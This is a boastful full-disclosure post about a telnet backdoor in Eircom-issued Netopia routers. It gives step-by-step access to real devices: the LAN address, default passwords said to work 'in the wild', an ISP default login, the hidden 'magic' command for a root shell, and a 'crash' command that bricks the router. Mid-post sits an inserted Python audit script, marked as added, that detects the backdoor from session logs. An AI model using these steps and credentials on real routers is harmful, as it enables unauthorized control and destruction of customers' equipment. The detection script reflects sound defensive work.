++++++++++++++++++++
FULL DISCLOSURE OF EIRCOM NETOPIA ROUTER BACKDOOR VULNERABILITY!

Yes, failcom suck, and they did it again. DERP! They gave us a nice TELNET shell into their routers, and now we can mess about 'cos it spawns a root shell by magic! (and magic is the actual command!) They also left a lovely web interface with supposed remote access capability, but I have to test that fully. Thanks to this, evil people could be hiding "in your switches rerouting your riches!"

Disclosed by: Netcat, Hex, Chess.
++++++++++++++++++++
Netopia SOC OS version 7.8.0 has a simple TELNET backdoor. If a malicious attacker is on the local area network of a Netopia router, and they TELNET to 192.168.1.254 they are greeted with the following prompt... There is no password needed!
++++++++++++++++++++
Terminal shell v1.0
Copyright ©2008 Motorola, Inc. All rights reserved.
Netopia Model 2247-02 High-Power Wireless DSL Ethernet Managed Switch
Running Netopia SOC OS version 7.8.0 (build r2)
Multimode ADSL Capable
(Admin completed login: Full Read/Write access)
Netopia-2000/146306722576>
++++++++++++++++++++
If it does ask for a passphrase, we found admin/admin and admin/password worked every time in the wild. At the 'Admin shell' a help command gives you the following menu...
++++++++++++++++++++
Netopia-2000/146306722576> help
arp               to send ARP request
atmping           to send ATM OAM loopback
clear             to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log         to clear stored log data
configure         to configure unit's options
diagnose          to run self-test
download          to download config file
exit              to quit this shell
help              to get more: "help all" or "help help"
hotspot           to set or show hotspot authentication info
install           to download and program an image into flash
license           to enter an upgrade key to add a feature
log               to add a message to the diagnostic log
loglevel          to report or change diagnostic log level
netstat           to show IP information
nslookup          to send DNS query for host
ping              to send ICMP Echo request
quit              to quit this shell
reset             to reset subsystems
restart           to restart unit
show              to show system information
start             to start subsystem
status            to show basic status of unit
telnet            to telnet to a remote host
traceroute        to send traceroute probes
upload            to upload config file
view              to view configuration summary
wan_type          to Set WAN interface type
who               to show who is using the shell
?                 to get help: "help all" or "help help"
wps               to issue Wireless Protected Setup commands
Netopia-2000/146306722576>
++++++++++++++++++++
However, typing the command 'magic' (not listed) brings up a new shell...
++++++++++++++++++++
Netopia-2000/146306722576> magic
(poof!)
Netopia-2000/146306722576# help
arp               to send ARP request
atmping           to send ATM OAM loopback
brcm              to read/write broadcom switch
clear             to erase all stored configuration information
clear_certificate to clear stored SSL certificate
clear_log         to clear stored log data
configure         to configure unit's options
diagnose          to run self-test
download          to download config file
exit              to quit this shell
help              to get more: "help all" or "help help"
hotspot           to set or show hotspot authentication info
install           to download and program an image into flash
loopback          to set the interface in loopback mode
license           to enter an upgrade key to add a feature
log               to add a message to the diagnostic log
loglevel          to report or change diagnostic log level
netstat           to show IP information
nslookup          to send DNS query for host
ping              to send ICMP Echo request
quit              to quit this shell
reset             to reset subsystems
restart           to restart unit
rma_count         to perform RMA functions
show              to show system information
sslclient         to send HTTPS request to the Server. Default Port is 433
start             to start subsystem
status            to show basic status of unit
telnet            to telnet to a remote host
traceroute        to send traceroute probes
upload            to upload config file
view              to view configuration summary
wan_type          to Set WAN interface type
ata               to issue commands related to remote ATA configuration
who               to show who is using the shell
access_code       to show if access code is valid
bootflags         to show or set the bootflags
checksum          to calculate and display the cksums
console           to make this session the console
mem               to display or edit system memory
trace             to toggle routing tracing
crash             to cause system death
adsldebug         to debug commands
dsm               to DSM commands
set_language      to set web display language
peer-address      to print IP address of this shell user
?                 to get help: "help all" or "help help"
wps               to issue Wireless Protected Setup commands
Netopia-2000/146306722576#
+++++++++++++++++++++++
The 'Crash' command literally bricks the router. This shell is the root shell.
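For anyone auditing a saved session from one of these units, here is an added example (not part of the original disclosure) that parses the two help listings to show which commands only the '#' shell offers, and flags a session where the admin banner arrives before any credentials were sent. The function names, the abbreviated listings and the session log format are assumptions made for the example.

```python
import re

# Constructed, abbreviated excerpts of the '>' and '#' help listings.
USER_HELP = """\
Netopia-2000/146306722576> help
arp        to send ARP request
configure  to configure unit's options
ping       to send ICMP Echo request
"""
ROOT_HELP = """\
Netopia-2000/146306722576# help
arp        to send ARP request
brcm       to read/write broadcom switch
configure  to configure unit's options
ping       to send ICMP Echo request
bootflags  to show or set the bootflags
mem        to display or edit system memory
crash      to cause system death
"""
# Constructed session log: (direction, text); "recv" = sent by the router.
SESSION = [
    ("recv", "Terminal shell v1.0"),
    ("recv", "(Admin completed login: Full Read/Write access)"),
    ("recv", "Netopia-2000/146306722576>"),
]
ENTRY = re.compile(r"^\s*(\S+)\s+to\s+(\S.*)$")  # "<command> to <description>"

def parse_help(text):
    """Map command name -> description for every menu row in a help listing."""
    return {m.group(1): m.group(2).strip()
            for m in map(ENTRY.match, text.splitlines()) if m}

def hidden_shell_extras(user_text, root_text):
    """Commands offered only by the '#' shell, in listing order."""
    user = parse_help(user_text)
    return [c for c in parse_help(root_text) if c not in user]

def admin_before_credentials(session):
    """True if the admin banner arrives before the client has sent anything."""
    for direction, text in session:
        if direction == "send" or "Admin completed login" in text:
            return direction == "recv"
    return False

if __name__ == "__main__":
    print("admin shell without credentials:", admin_before_credentials(SESSION))
    for cmd in hidden_shell_extras(USER_HELP, ROOT_HELP):
        print("root-only:", cmd, "-", parse_help(ROOT_HELP)[cmd])
```

The same functions work on the full listings if they are pasted in place of the excerpts.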
It gets even worse though... It has a lovely web interface if you open that web address in a browser!
+++++++++++++++++++++++
A malicious attacker on the LAN can do all kinds of things...
+++++++++++++++++++++++
ALL ROUTERS ISSUED BY EIRCOM THAT WE HAVE SEEN THUS FAR ARE VULNERABLE. THIS IS JUST AS BAD AS THEIR 'PREDICTABLE WEP KEY GENERATION ALGORITHM'.

Not to mention, Eircom's default login is always: eircom@eircom.net broadband1
+++++++++++++++++++++++
Thanks for reading! Soon to come... can we overflow bit torrent buffers?